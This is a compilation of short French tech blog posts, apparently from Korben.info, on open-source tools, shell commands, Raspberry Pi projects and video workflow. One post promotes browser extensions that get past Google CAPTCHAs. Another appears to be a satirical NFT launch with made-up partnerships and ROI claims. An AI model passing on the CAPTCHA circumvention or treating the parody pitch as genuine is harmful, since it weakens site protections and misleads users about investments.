Dont voici le code… En gros, on initialise le shebang et y’a plus qu’à utiliser les fonctions de récupération des commandes comme elles sont décrites dans la documentation.

Ainsi, on importe la fonction $ (shell) et on lui passe la commande ls. On récupère la sortie (stdout) de ls dans la variable output et on affiche cette variable.

#! /usr/bin/env node

import { $ } from "zx";

const output = (await $`ls`).stdout;

console.log(output);

ZX est une façon agréable de faire des scripts bash avec NodeJS sans trop se prendre la tête. Vous pouvez même mixer ça avec de la doc en markdown pour exécuter le contenu « code » contenu dans un fichier .md.

Évidemment, je vous recommande lire la doc pour aller au-delà de mon petit exemple.

Ah et en bonus, pour les Patreons, je vous ai même fait un tuto en vidéo.

Merci de votre soutien !

Les plus écolos d’entre vous font sûrement attention à ce qu’ils mangent, à leur moyen de locomotion, à leurs achats en ligne… Mais est-ce que vous faites attention à la consommation électrique de vos serveurs et autres machines virtuelles ?

Pas forcement, car oui ce n’est pas simple à mesurer. Mais grâce à Scaphandre, vous allez pouvoir prendre connaissance de la consommation électrique de vos serveurs bare metal, de vos machines virtualisées (kvm, qemu)…etc. et pourquoi pas, afficher tout ça dans de jolis tableaux de bord.

Le but de Scaphandre est de permettre aux entreprises comme aux particuliers de connaître en détail la consommation électrique et de récupérer des données pour ensuite les injecter dans des outils comme Riemann ou Warp10 et de les exporter au format JSON.

Si ça vous tente d’installer cet outil, toute la documentation est ici.

Vos enfants sont surdoués, c’est sûr ! Il y a qu’à voir les œuvres d’art qu’ils réalisent à l’école. Des bonhommes patates qui rendraient jaloux n’importe quel homme de Néandertal au fond de sa grotte.

Alors pour rendre hommage à ces artistes incompris qui ne vous rapporteront pas un rond avec leurs oeuvres, pas même en NFT, je vous propose aujourd’hui d’animer leurs créations grâce au site Animated Drawings.

Vous importez un dessin

Et le site se chargera de l’animer. Plusieurs postures et mouvements sont disponibles et tout est exportable au format MP4.

Génial par exemple pour faire un dessin animé avec vos enfants.

Si vous êtes propriétaire d’une voiture à piles Tesla, vous allez pouvoir programmer un vrai spectacle son et lumière grâce à uide officiel dispo sur Github.

Armé du logiciel xLights, vous apprendrez à régler l’allumage de tout ce qui peut s’allumer sur votre Tesla, et synchroniser tout ça avec une piste musicale pour obtenir un rendu comme celui-ci :

Cela est compatible avec la Model S (>= 2021), la Model 3, la Model X (>= 2021) ou encore la Model Y. Une fois votre script terminé, vous le mettez sur une clé USB et un menu apparaitra sur l’écran de la voiture pour lancer le show.

Manque plus qu’une petite faille dans l’OS de la bagnole pour lui passer un script qui fait un « son et lumières » avec l’accélérateur et le frein 🙂

Si vous avez une petite communauté sur Internet, peut-être organisez-vous de temps en temps des concours sur les réseaux sociaux.

Perso, j’en fais uniquement avec mes Patreons, parce que les tirages au sort sur les Twitter, Instagram ou Facebook c’est la misère. Heureusement, j’ai découvert Lukky, une application iOS et Android qui permet à la fois de préparer un concours avec tout ce qu’il faut dedans.

Vous choisissez une vignette, vous décidez des modalités du concours, à savoir si les gens doivent vous follow, faire des retweet, des likes et ce genre de chose et vous obtenez un message à poster sur vos réseaux sociaux.

Vient ensuite le moment du tirage au sort. Vous connectez vos comptes Insta / Twitter…etc. à Lucky et vous choisissez le message qui a fait l’objet du concours et hop, vous pourrez faire le tirage en respectant les critères donnés : Le nombre de gagnants, le follow, le commentaire voire même une « expression obligatoire » genre mot clé…etc.

Bref, Lukky est une application super bien pensée pour les concours et parfaitement utilisable en mode gratuit. Les options payantes supplémentaires vous coûteront la modique somme de 39,99 € / an ce qui est pas cher pour une entreprise par exemple.

Vous allez enfin pouvoir offrir « 100 $SHITCOIN A LA COMMU SI TU LIKE & FOLLOW« … loool (j’en peux plus).

Peu importe l’OS qu’on utilise, avoir un Shell c’est la base… Windows Terminal, le Shell Linux, le terminal macOS… et bien sûr sur Android, c’est parfaitement jouable également.

Mais sous iOS ?

Et bien c’est également possible. Il y a des applications pour cela et l’une des plus pratiques à prendre en main sur iPhone ou iPad est iSH.

iSH est un Shell open source pour iOS qui utilise une émulation x86 en mode « usermode » avec un mapping vers les appels système d’iOS. C’est super pratique si vous avez besoin par exemple de lancer un petit script en ligne de commande à partir de votre smartphone ou si vous souhaitez vous connecter en SSH à un serveur distant.

Pas besoin de connaître de raccourcis compliqués et l’interface est super simple.

J’ai déjà eu besoin de ce genre de truc, notamment lors de vacances où je m’étais dit « Soyons fous, partons sans laptop, je laisse les clés du serveur à quelqu’un qui s’y connaît…« 

Ouais, mais en fait, non, ce n’était pas une bonne idée. On n’est jamais mieux servi que par soi-même.

Bref, iSH, le Shell Linux pour iOS est disponible ici sur l’Appstore iOS (et sur l’AltStore pour ceux qui ont jailbreak leur iPhone.)

Si vous faites de la musique ou toute autre activité non sexuelle impliquant un appareil MIDI connecté en USB, voici un projet open source qui va vous plaire.

OpenDeck de son petit nom est un firmware libre qui permet de transformer des cartes comme des :

• Arduino Mega2560
• Arduino Mega2560 Pro Mini / Meduino
• Mux Shield v2 with Arduino Mega2560
• Teensy++ 2.0
• STM32F4 Discovery
• STM32F401CC Black Pill
• STM32F401CE Black Pill
• STM32F411 Black Pill
• Waveshare Core405R
• Waveshare Core407V
• Waveshare Core407I
• STM32F4VE (eBay)
• TPyBoard (clone de PyBoard)
• nRF52840 DK

…en contrôleur MIDI fait maison comme ceci :

Grâce à OpenDeck, votre montage sera ainsi compatible n’importe quel logiciel sachant exploiter les appareils MIDI comme votre DAW.

Ainsi, OpenDeck vous permettra de contrôler le comportement précis de votre appareil MIDI custom et côté logiciel, vous n’aurez rien à programmer, puisqu’un « Configurateur » est également disponible ici (ou offline là).

Et si vous voulez acheter un truc tout fait et ne pas vous lancer trop dans la technique, une carte est commercialisée ici avec tout ce qu’il faut dessus.

Hier, je vous expliquais comment retirer les sons parasites sous Linux lorsque vous vous enregistrez avec votre micro. Et bien aujourd’hui, on va faire la même chose en plus simple. Oui en plus simple car sous macOS !

Comment ?

Et bien grâce au logiciel Utterly qui dans sa version gratuite permet d’éliminer certains bruits environnants comme on en trouve dans les open spaces, les cafés, ou dans votre cuisine (micro onde, eau qui coule…etc).

Globalement, dès que des gens parlent de manière indistincte derrière vous, Utterly supprime le blabla.

Et si vous optez pour la version payante à partir de 5 $/mois, vous aurez le droit à plus de sons parasites couverts : enfants qui jouent, chien qui aboie, bruit de lave-vaisselle, bruit de circulation, travaux dans la rue…etc.

Sachez aussi que le plugin Utterly payant reste utilisable gratuitement à hauteur de 2h par semaine. À croire qu’ils ne veulent pas le vendre.

Génial pour ceux qui font du livestream dans des endroits bruyants ou qui sont obligés de garder leurs enfants à la maison tout en gérant une discussion zoom avec les équipes marketing de San Francisco.

Vous pouvez télécharger Utterly ici.

Si vous utilisez Linux et que vous enregistrez votre voix dans un environnement bruyant ou que vous faites des visioconférences en plein milieu d’une crèche, voici votre salut !

Il s’agit de NoiseTorch, une application open source qui fonctionne avec PipeWire et PulseAudio et qui permet de supprimer tous les bruits non désirés.

Pour cela, NoiseTorch créé un microphone virtuel que vous pouvez ensuite utilisé dans toutes vos applications, aussi bien OBS que Zoom ou autre. La démo à 6m55 est vraiment impressionnante !

Que ce soit des bruits de touches de clavier, un train qui passe, les ventilateurs de vos cartes graphiques en train de miner du Bitcoin ou que sais-je encore, tout sera retiré grâce à NoiseTorch, conservant uniquement votre douce voix.

Il y aura un peu de latence, mais c’est vraiment très petit, donc ça ne vous posera pas de problème.

Génial non ?

Vous retrouverez les sources de NoiseTorch ici.

Et dans le même genre, pour ceux qui veulent aller encore plus loin, il y a ici les sources d’un plugin VST qui fait la même chose.

Si vous faites de la photo, vous avez sûrement rencontré le problème suivant : lorsqu’on prend une photo dans un endroit mal éclairé, on a du bruit sur l’image.

Pour remédier à cela de manière efficace, il existe un outil open source nommé Burst Photo qui est capable à partir d’une série de photos pleines de bruit, d’en générer une propre. Pour que cela fonctionne, il faut d’abord capturer une dizaine d’images de votre sujet.

Ensuite, il faut récupérer ces photos au format RAW (.DNG) avec Adobe Lightroom ou à l’aide de Adobe DNG Converter. Il ne reste plus qu’à glisser-déposer toutes vos photos DNG sur l’outil Bust Photo et celui-ci vous générera un cliché final sans bruit.

Ainsi, vous pourrez prendre des photos de nuit / soir sans pour autant investir dans du matériel spécifique.

+ d’infos ici

Amis développeurs, si vous suivez assidûment ce site, vous connaissez forcement ngrok dont j’ai parlé en 2013 ou encore Tailscale plus récemment.

Ce genre d’outils permet d’exposer un service local sur Internet. C’est super pratique pour tester ou faire tester un site web mais pas uniquement.

L’outil que j’aimerai vous présenter aujourd’hui s’appelle Fast Reverse Proxy ou FRP pour les intimes. Ce logiciel en ligne de commande va vous permettre d’exposer sur Internet, un serveur local derrière un firewall ou un réseau NATé. FRP fonctionne aussi bien en UDP et TCP qu’avec HTTP et HTTPS.

Ainsi grâce à cet outil, vous pourrez très facilement au travers d’internet, accéder en SSH à un ordinateur dispo uniquement dans un LAN, tester vos sites en cours de dev, forwarder un socket Unix ou encore établir une connexion P2P.

Toute la config se définit sans le fichier frpc.ini comme décrit dans la documentation.

À découvrir ici.

Si vous venez d’acheter un Mac Mini M1 d’Apple, vous avez peut-être constaté que l’affichage sur votre écran était abominable. En effet, si votre écran n’est pas Retina, le rendu d’affichage est baveux / flou.

Ça fout les boules de payer un ordinateur aussi cher pour se bousiller les yeux parce qu’Apple n’autorise pas l’activation du HiDPI lorsqu’on connecte un écran externe sur le Mac Mini.

Comment savoir si c’est autorisé ou pas avec votre écran ?

Et bien si la qualité est bonne et que vous voyez ces options dans les réglages d’affichage, c’est OK.

Si la qualité est médiocre et que ces options n’apparaissent pas, ce n’est pas bon.

Alors que faire ?

Il existe un outil qui s’appelle Better Dummy qui une fois installé sur votre Mac Mini, vous permet de simuler un écran dans la résolution de votre choix. Comme vous pouvez le voir sur la capture ci-dessous, on peut simuler des écrans 4K, 5K, 6K et c’est ce qui nous intéresse.

Cette application est vraiment pratique pour tous ceux qui ne sont pas satisfaits des résolutions HiDPI par défaut proposées par macOS ou encore pour ceux qui ont un écran tout pourri et qui ne sont pas satisfaits des captures écrans qu’ils font.

En gros, grâce à ce logiciel libre, vous aurez votre écran normal + cet écran virtuel « Dummy » que vous ne pouvez pas encore voir, car il est virtuel.

Ensuite, c’est en faisant de cet écran virtuel votre écran principal (Main) et en activant la recopie de cet écran virtuel sur votre écran principal que vous pourrez en profiter.

Voilà, problème réglé. Mac OS pensera que vous avez un écran Rétina et il vous proposera les bonnes options et un affichage de qualité !

Vos yeux peuvent me remercier 🙂

Il y a encore plus cool que d’essayer de convertir quelqu’un à une autre religion : Convertir des fichiers dans d’autres formats 🙂

C’est carrément plus utile et moins fatigant. Grâce au site MConverter, vous allez pouvoir convertir n’importe quoi en n’importe quoi.

Par exemple, une vidéo dans un autre format vidéo plus obscur, des images au format voire même dans un format vidéo. Des documents de toutes sortes, des archives (zip, rar, apk, tar…etc.), des sous-titres dans différents formats et même des ebooks ou encore des fichiers propres à Minecraft (mcaddon, mcpack, mctemplate, mcworld).

Pour lancer une conversion, rien de plus simple : Vous le glissez dépose, vous choisissez le format de sortie et voilà !! L’outil est limité à des fichiers de 200 MB max, tout est transmis de manière sécurisée (SSL) et vous pouvez comme ça faire des conversions en masse.

Si vous vous intéressez un peu à la vie privée et aux outils libres, vous connaissez peut-être Invidious, un front-end pour Youtube qui permet de consulter les vidéos du site sans subir tout le tracking de Google, ou encore Nitter qui fait ça pour Twitter.

Et bien dans le même esprit, voici Libreddit qui vous permettra d’accéder à Reddit sans être tracké. Cet outil codé en Rust est sans pub ni tracking et toutes les requêtes que vous ferez seront proxyfiées au travers du serveur, y compris lors du chargement des médias.

Ainsi, Reddit ne saura absolument rien sur votre passage. Par contre, vous n’aurez accès qu’au contenu public de Reddit accessible sans être connecté. Vous pouvez évidemment utiliser ce script sur votre machine ou accèder à l’une des instances publiques.

Dans le même genre, il existe également Teddit pour ceux qui veulent voir.

Si sous Linux, vous installez des Flatpak, voici un utilitaire bien pensé, nommé Flatseal qui vous permettra de gérer leurs permissions / éléments du système auxquels ils ont accès.

Vous pourrez par exemple empêcher certains Flatpak d’accéder au réseau, d’utiliser ou non l’accélération GPU, le Bluetooth, et certaines parties de votre système de fichiers.

Et évidemment, il s’installe en Flatpak ici.

Et si vous cherchez un outil pour mieux gérer vos installations de Flatpak ou autre, je vous recommande également ce logiciel.

(Et le nettoyeur de métadonnées dans la capture écran est ici).

Aujourd’hui, j’aimerais vous parler de mon processus de création de vidéos. Comme vous le savez, je ne me considère pas comme un « Youtubeur », mais je fais quand même une vidéo par semaine environ que je réserve aux gens qui me soutiennent sur Patreon.

Faire une vidéo et la mettre sur YouTube est quelque chose qui demande beaucoup de travail et comme mon temps est précieux, j’ai essayé d’optimiser ça au maximum.

Je vais donc vous décrire mon Workflow pour enregistrer et monter ma vidéo aussi rapidement que possible.

Le sujet

Alors trouver le sujet n’est pas quelque chose de facile. Il faut que ce soit intéressant, visuel, et que ça ne soit pas trop complexe pour que les gens qui vont regarder la vidéo puissent le refaire chez eux facilement.

Pour Patreon, mon domaine se limite donc à des sujets qui paraissent complexes, mais qui en réalité ne le sont pas. Et mon job, c’est de montrer aux gens que finalement, un peu de Docker, un peu d’IA, un peu de blockchains, etc., ce n’est pas quelque chose d’insurmontable. Je me concentre donc sur des initiations pour donner ensuite envie aux gens de creuser et d’aller plus loin.

Mais attention, chaque vidéo bien que ce soit initiatique permet quand même d’atteindre un objectif précis. C’est du tuto, ça doit être concret et faisable en un temps limité (environ 40 min).

Le matériel

Pour le matériel, je reste avec le même matos que pour mon streaming, à savoir :

• Une webcam Logitech Brio 4K
• Une lampe El Gato Key Light Air
• Un micro Shure SM7B
• Un fond vert que j’ai fixé sur une tringle à rideaux derrière moi.
• 3 écrans : Un pour la régie / chat + un qui sera filmé + un qui me sert à lire mes notes

Le tournage

Pour le tournage, je fonctionne en mode screencast. C’est-à-dire que je filme mon écran. Mais je filme également ma tête en grand. Comme j’ai l’habitude de streamer sur Twitch, j’utilise OBS également pour enregistrer mes tutos.

J’ai donc 3 scènes :

• Screencast où on voit mon écran et moi en petit en bas à droite.
• Screencast Big où on voit uniquement ma tronche sur fond noir
• Screencast Big Fond Vert où on voit ma tronche en grand, mais sur fond vert si jamais je veux incruster un truc derrière moi.

Pour la config OBS en elle-même, je me suis fait une config maison afin de générer du MP4 de bonne qualité et un flux audio correct.

Ensuite, quand je commence l’enregistrement, je pars sur un tournage en une traite. Mais vous le savez c’est impossible. Donc je fais des blancs quand j’ai besoin de réfléchir, ou je stoppe l’enregistrement lorsque je perds le fil pour ensuite relancer l’enregistrement d’une nouvelle séquence qui sera la suite. Ensuite, je numérote chaque séquence.

Le montage

Ensuite, je mets tout ça dans Final Cut, et je raccourcis la fin de chaque séquence si par exemple, j’ai bafouillé ou que je me suis trompé au point de devoir stopper l’enregistrement. Comme ça tout s’enchaîne correctement et j’exporte la vidéo en MP4 en 1920 x 1080.

Cette partie va très vite, car il n’y a pas de montage mis à part raccourcir certaines séquences en cas de besoin.

Comme je vous le disais, quand j’ai besoin de réfléchir à ce que je vais dire, je ne coupe pas l’enregistrement. Je fais juste un long blanc avant de reprendre comme si de rien n’était. Je ne coupe pas ces blancs dans Final Cut lors du montage, mais évidemment je ne les laisse pas non plus. Alors comment je fais ?

Et bien j’ai investi dans Recut, un logiciel pour macOS (et bientôt Windows) qui coute 100 balles et qui permet détecter et retirer automatiquement tous les blancs d’une vidéo. Super pratique, comme ça, tous mes cuts sont gérés et je gagne un temps de dingue. Je ne pourrais plus m’en passer.

En tout cas, c’est grâce à Recut que je peux passer le moins de temps possible sur le montage d’une vidéo. Ainsi ma vidéo est exportée sans les blancs… Et l’outil peut même générer un fcpxml pour importer la liste des séquences à couper dans Final Cut afin d’affiner le montage si vous avez besoin.

L’upload

Ma vidéo est terminée, je peux donc l’envoyer sur YouTube. Pendant qu’elle s’uploade et qu’elle est convertie au bon format, ce qui peut prendre un peu de temps, je rédige la description, je mets les mots clés, je mets les liens des trucs dont je parle dans la vidéo et je fais la vignette. Je rédige même le post Patreon dans la foulée.

La vignette

Pour la vignette, j’ai un modèle tout fait où je remplace une image et 2 lignes de texte. Ça me prend moins de 5 min, le temps de trouver une illustration cool. J’utilise Pixelmator comme logiciel, mais n’importe quel outil qui gère les calques (comme Photoshop) peut faire l’affaire.

Conclusion

Voilà mon process de réalisation de vidéo. C’est loin d’être parfait en termes de rendu, car je n’écris pas de texte et je prépare le minimum, donc parfois je me trompe, je tombe sur des bugs…etc. ce qui est cool, car ça me permet de vous montrer comment les régler et on reste dans un esprit « À la cool » sans prise de tête que j’adore sur Internet.

J’espère que ça vous aura inspiré ou au moins éclairé. N’hésitez pas à venir sur mes Twitch si vous avez des questions, j’y répondrai en live.

Si vous appréciez le langage Powershell de Microsoft, vous serez sûrement ravis de découvrir qu’il est possible d’établir une connexion à un ordinateur Windows à distance (bureau à distance), sans avoir besoin d’installer quoi que ce soit.

J’ai réalisé cette vidéo dans le cadre de mon Patreon pour les gens qui me soutiennent et qui souhaitent que Korben.info continue le plus longtemps possible. Merci à vous chers soutiens !

Si vous utilisez Linux, vous connaissez forcément la commande « cat » qui permet d’afficher le contenu d’un fichier au format texte.

Vous connaissez aussi peut-être « less » qui permet également de se balader dans un fichier texte plus facilement.

Mais connaissez-vous BAT ?

Bat est donc un clone de « cat » qui propose pas mal de fonctionnalités super cools comme la coloration syntaxique pour un grand nombre de formats de fichiers et de langages, le support de Git qui permet de voir les modifications sur un fichier, ou encore l’affichage des caractères non imprimables grâce au paramètre -A.

bat -A monfichier.txt

Comme vous pouvez le voir sur les captures, il y a également la numérotation des lignes et bien sûr une pagination automatique (comme avec « less »).

Vous pourrez aussi afficher plusieurs fichiers en même temps ou appeler bat en argument comme ceci

curl -s https://sh.rustup.rs | bat

Pour installer bat sous Debian / Ubuntu, pas besoin de (bat) signal mais simplement d’apt :

sudo apt install bat

On peut bien sûr l’installer sur tous types de distrib et même macOS avec Brew.

Si ça vous dit, toute la doc et le code source se trouvent ici sur Github.

Puis, quel plaisir de pouvoir faire un bat man « man bat »

Tout le monde connaît ces extensions qui sont capable de remplir les champs d’un formulaire avec vos infos… Nom, prénom, date de naissance, numéro de CB…etc. Super pratique !

Mais saviez-vous que l’extension Firefox Fake Data propose la même chose, sauf qu’au lieu de renseigner vos infos personnelles dans les champs, elle va les remplir avec de fausses données.

Super pratique pour masquer votre identité ou tout simplement ne pas perdre de temps à remplir un formulaire lorsque vous testez un service en ligne pas important pour vous.

Fake Data propose de générer la donnée, mais vous pouvez aussi mettre vos propres fonctions JavaScript pour avoir des données qui correspondent à vos tests.

Évidemment, l’extension propose des raccourcis clavier pour remplir les champs encore plus rapidement :

• Mac : Cmd + double clic
• Windows / Linux : Alt + double clic

A télécharger ici.

— Cet article n’est en aucun cas un conseil en investissement, mais simplement la présentation d’un projet technique autour de la blockchain. Ceci n’est pas un article sponsorisé. —

Si vous jouez un peu au jeu de l’achat / revente de cryptomonnaies, vous vous demandez peut-être à chaque fois, à QUEL moment il faut acheter ?

Ce n’est pas simple et n’étant pas trader ni cryptobro, je ne saurais pas vous dire. Mais j’imagine que vous avez déjà vos petits indicateurs perso comme des indicateurs d’analyse technique, les calls d’un influenceur de Dubaï ou votre chat qui se passe la patte derrière l’oreille.

Quoiqu’il en soit, il y a un super site qui s’appelle 4Kings, qui techniquement se repose sur l’indicateur de retracement de Fibonacci et qui permet d’un seul coup d’œil de savoir si une crypto est en mode « C’est le moment d’acheter » / « C’est le moment de vendre » / « C’est le moment de ne rien faire et d’attendre ».

Le site se présente donc sous la forme d’une liste de cryptos, que vous pouvez ordonner selon vos envies et surtout limiter à certains exchanges (Binance, FTX, Kraken…etc.)

Évidemment, il ne faut pas reposer tout sur 4Kings car c’est un système automatisé qui a évidemment ses limites mais ça peut vous permettre de faire une présélection de crypto à regarder plus en détail.

À découvrir ici

Je ne sais pas pour vous, mais moi, les captchas de Google, ça me saoule d’une force… Sélectionner des bateaux, des bornes incendies ou des vélos 10 fois de suite, j’en peux plus.

Mais pas le choix parfois, alors on fait le toutou et on clique clique clique…

Heureusement, il existe une extension pour Chrome, Firefox ou encore Opera qui va vous changer la vie. Cette extension c’est Buster qui est capable de résoudre les captchas en passant par le mode audio et en faisant de la reconnaissance vocale sur ces derniers.

En effet, beaucoup l’ignorent, mais pour les personnes mal voyantes, il est possible d’avoir des captchas audio. C’est donc cette faille qu’exploite Buster et après l’avoir testé, c’est vraiment super, car ça fait gagner un max de temps.

Alors évidemment, ça ne fonctionne pas à tous les coups et si vous les enchaînez trop vite, Google peut vous bloquer temporairement. Mais pour le commun des mortels, c’est parfait !

Et pour ceux qui se farcissent ces captchas où il faut cocher une case pour dire qu’on est un humain et pas un robot, il y a également cette extension pour Chrome qui n’est ni plus ni moins qu’un robot qui cliquera à votre place. Et oui…

Et cette extension, c’est « I’m not a robot captcha clicker« .

Elle n’est pas belle la vie ?

Si vous utilisez macOS sur votre machine, il ne vous aura pas échappé que depuis plusieurs versions de l’OS, Apple propose de fonds d’écrans dynamiques qui évoluent en fonction du moment de la journée. Il y en a 8 par défaut et rien de foufou malheureusement.

Heureusement, grâce à l’outil libre Equinox, vous allez pouvoir créer des fonds d’écran dynamiques pour macOS sans aucune limite. Au travers d’une interface super simple à prendre en main, vous devez d’abord choisir le type d’enchainement que vous voulez.

Vous pouvez donc choisir entre :

• Solaire, qui tient compte de la position du soleil. Rien de trop complexe puisqu’une calculatrice solaire vous permettra de mettre les bons paramètres. Vous avez juste besoin de savoir quand et où vous avez pris la photo.
• Temporel, qui associe une heure à chaque photo pour faire des enchainements en fonction de l’heure.
• En fonctionne de l’apparence de votre OS… Si vous êtes en mode clair ou en mode sombre, ça ne sera pas la même photo. Vous n’aurez besoin que de 2 images pour ce mode.

Ensuite, vous balancez une poignée de photos et l’outil vous générera un wallpaper dynamique que vous pourrez ensuite exporter, mettre sur votre macOS en le glissant / déposant dans les paramètres, envoyer à vos amis ou commercialiser sur votre site buy-dynamic-wallpaper-pas-cher.com.

Bref, de quoi s’amuser, surtout si vous voulez faire ça bien et prendre de vraies photos d’un même lieu à différentes heures de la journées ou différentes saisons.

Equinox est dispo sur Github ici.

Si vous êtes artiste et que vous voulez vous en mettre plein les poches faire plaisir à votre communauté, c’est le moment de lancer votre collection de NFTs.

Mais comment faire quand on sait uniquement dessiner et ne pas coder pour mettre ça en ligne ?

Et bien rien de plus simple avec Nifty Generator qui va vous permettre d’assembler aléatoirement vos calques images pour produire des milliers d’images avec leurs métadonnées qui seront ensuite référencées dans une blockchain Solana ou Ethereum.

Vous pourrez ainsi configurer le nom et la description de la collection, les royalties que vous voulez percevoir sur les reventes, le symbole de la collection et comment doit se partager les royalties sur différents wallets.

Hyper simple à utiliser. A vous de jouer maintenant 🙂

Bon, c’est parce que je ne sais pas dessiner sinon, vous auriez déjà votre collection de NFTs « Korben » ;-)))

Les auteurs de ce site ont également créé la collection de NFT Mycoverse, ainsi qu’un site qui vous permet de dessiner en pixel art pour vendre ensuite vos oeuvres ou encore Nifty Airdrop qui vous sort une liste de toutes les adresses qui ont récupéré vos NFTs, pour ensuite pouvoir les remercier avec un petit airdrop surprise.

Ça vous dirait un petit outil pour faire des recherches rapides sur votre ordinateur ?

Bah oui parce que la recherche native de Windows, c’est pas encore ça.

Alors ?

Et bien il suffit d’installer Flow Launcher en le téléchargeant ici …

Ou en utilisant des gestionnaires de paquets comme Winget :

winget install "Flow Launcher"

Ou scoop :

scoop install Flow-Launcher

Cet outil va vous permettre d’accéder rapidement à vos applications, vos documents, mais également vos bookmarks, YouTube, Twitter, Wikipédia, Google…etc. Vous pourrez même lancer des commandes comme verrouiller l’écran ou éteindre l’ordinateur.

Flow Launcher est également totalement personnalisable, du style aux raccourcis clavier en passant par les plugins que vous pouvez rajouter pour faire des recherches particulières.

C’est bien sûr un outil libre et les sources sont sur Github.

Le site de Flow Launcher est ici.

Si vous avez des fichiers audio lossless FLAC et que vous voulez les convertir au format lossless d’Apple (ALAC), sachez-le, c’est possible avec ffmpeg.

Cette commande fonctionnera même s’il y a des cover art (pochettes d’album) dans vos FLAC.

Vous devez avoir ffmpeg installé et entrer la commande suivante dans un terminal :

ffmpeg -i audio.flac -c:v copy -c:a alac audio.m4a

Et si vous voulez convertir plusieurs fichiers d’un coup, placez vous dans le répertoire contenant vos fichiers et entrez la commande suivante :

for f in ./*; do ffmpeg -i "$f" -c:v copy -c:a alac "${f%.*}.m4a"; done

Yeah !

Si vous êtes en train de vous former à la sécurité informatique, vous devrez à un moment vous monter des serveurs en local pour tester vos connaissances.

Cela peut prendre pas mal de temps, mais heureusement, dans le même esprit que Damn Vulnerable Linux, si vous avez un Raspberry Pi, vous pourrez faire ça facilement grâce à RasPwn.

Imaginé comme un outil d’entraînement, RasPwn OS est un système d’exploitation basée sur une Debian de 2015 totalement vulnérable, avec des failles de sécurités présentes dans les daemons, les services, les applications web…etc. en place sur le système. RasPwn OS contient une suite d’applications web nommée le Raspwn Web Playground qui sont soit obsolètes soit configurées de telle manière qu’elles sont vulnérables.

Vous pourrez ainsi vous entrainer au pentesting et autre sans avoir à vous connecter à Internet.

Si ça vous dit de télécharger et d’installer RasPwnOS sur votre Raspberry Pi, c’est par ici que ça se passe.

Et pour commencer votre apprentissage, il y a un tutoriel ici.

Si vous avez besoin de partager l’affichage de votre ordinateur sur un écran ou une télévision dans le cadre par exemple d’une conférence, d’un salon ou d’un cours devant des étudiants, voici un moyen de le faire avec un Raspberry Pi.

Pour faire fonctionner cet outil, vous aurez besoin d’un Raspberry Pi avec Raspberry Pi OS installé dessus. Ensuite, vous devrez connecter l’écran au Rpi à l’aide du câble HDMI et configurer le réseau du Rpi pour qu’il soit sur le même réseau Ethernet ou Wifi que l’ordinateur.

Installez ensuite le paquet de la dernière version de Berry Share comme ceci :

apt update
sudo apt install -y ./berry-share_.deb
sudo systemctl start berry-share

Une fois que c’est fait, ouvrez le navigateur Chrome sur votre ordinateur et entrez l’URL suivante :

https://ADRESSE_IP_RASPBERRY:30001

Vous aurez un message d’avertissement au sujet de la connexion qui n’est pas privée. Passez l’autorisation puis choisissez l’option « Entire screen » pour enfin cliquer sur le bouton « Share ».

Le partage commencera alors et le Raspberry Pi affichera ce qui se passe sur votre ordinateur.

Plus d’infos sur Berry Share ici.

Ça fait un moment que ça me trotte dans la tête et j’ai enfin décidé de passer à l’action. Cela fait des semaines que je travaille dans le plus grand secret avec un cabinet de conseil et un artiste de talent pour enfin vous proposer ma propre collection de NFT.

Alors attention, je ne vais pas vous vendre de vulgaires images de singes. En partenariat avec la French Teck, la BPI et le Fablab de la ville Belge de Sint-Jans-Molenbeek, ainsi qu’avec l’artiste New-Yorkais Gunsky, je vais dès cet après-midi vous proposer le mint exclusif de ma collection « Nucleus Quantum« .

Il s’agit de NFTs générés aléatoirement grâce à une IA Quantique, imprimés sur une vraie toile avec un tag NFC puis retouchés à la main par mon ami Gunsky avant d’être de nouveau numérisés, puis envoyé sur le réseau IPFS pour être ensuite inscrits définitivement dans les blockchains Avalanche, Polygon et Ethereum. J’ai bien sûr développé mon propre bridge KwaiRiver qui vous permettra de convertir vos NFTs d’une blockchain à une autre.

Le prix de départ du mint sera de 0.8 ETH. Évidemment, il faut voir ça comme un investissement à long terme avec un target goal de ROI > 3000%. J’ai déjà plusieurs partenariats qui s’annoncent avec des marques de mode et des influenceurs / artistes hip-hop.

Je vous donne tous ces détails pour vous rassurer évidemment, car je sais que lancer une collection de NFTs, c’est s’exposer à des critiques du genre : « C’est un ponzi, y’a pas d’utilité, wesh« .

Sauf qu’avec mon NFT, vous aurez de l’utilité. Vous pourrez par exemple participer à des soirées pyjama privées, obtenir des réductions chez mes partenaires comme PereNoel.fr, Surcouf et VideoFutur…. et cerise sur le gâteau accéder gratuitement à mon OnlyFan ainsi qu’à mon blog qui passera en format payant dès l’été 2022.

Patreon a été un succès et c’est vraiment une demande des lecteurs de pouvoir payer pour lire mon contenu jusqu’à présent gratuit.

Alors vous vous en doutez, je ne vais pas vous révéler immédiatement le contenu de cette collection, car je veux que tout le monde soit surpris après son mint, mais ce que je peux vous dire, c’est que cela mêlera les concepts d’informatique quantique, de croissance végétale, d’habitations durables et de notre rapport à la société humaniste dans un monde en transition climatique.

Évidemment, l’argent récolté sera reversé à ma fondation humanitaire qui aide les geeks de mon village à s’équiper en matériel pour pouvoir exercer leur profession de streamer Twitch.

Je ferai le reveal du site dès ce soir. Si vous êtes au rendez-vous, je peux vous dire que l’aventure ne s’arrêtera pas là. Si j’arrive à lever les 300 millions que je me suis fixé en objectif, j’ai sur ma roadmap le développement d’un Metaverse Erotique pour Q3 qui sera suivi en Q4 par la création d’un token (cryptomonnaie) qui permettra d’upgrader définitivement le Bitcoin en lui greffant une Layer 2+1 apportant des fonctionnalités de Digital Liquid Smart Contracts pour faire de la DeFi CBDC de manière anonyme et décentralisée dans le cloud.

En attendant, passez une bonne journée et merci pour votre confiance.

Si vous êtes un habitué des conférences Zoom, je pense que vous devriez lire cet article jusqu’au bout. En principe, quand on est un bon petit soldat, ce qu’il faut faire durant une réunion, c’est prendre des notes pour ne rien oublier et éventuellement faire un compte rendu.

C’est un peu pénible.

Heureusement, grâce à l’outil Fathom vous pourrez en un clic marquer des moments importants de l’appel puis relire ensuite la retranscription de la conf associé aux moments que vous avez noté. Vous pourrez également ajouter des notes à chaque moment pour ensuite exporter tout ça dans un Google Doc, un gestionnaire de tâche, ou l’envoyer par email.

Un formidable gain de temps grâce à cet outil qui pour le moment est totalement gratuit.

Si vous étiez trop jeune pour vivre les premières missions Apollo en direct à la TV, j’ai un site qui va vraiment vous intéresser puisqu’il vous permet de revivre les missions Apollo 11, 13 et 17 minute par minute, sans Tom Hanks.

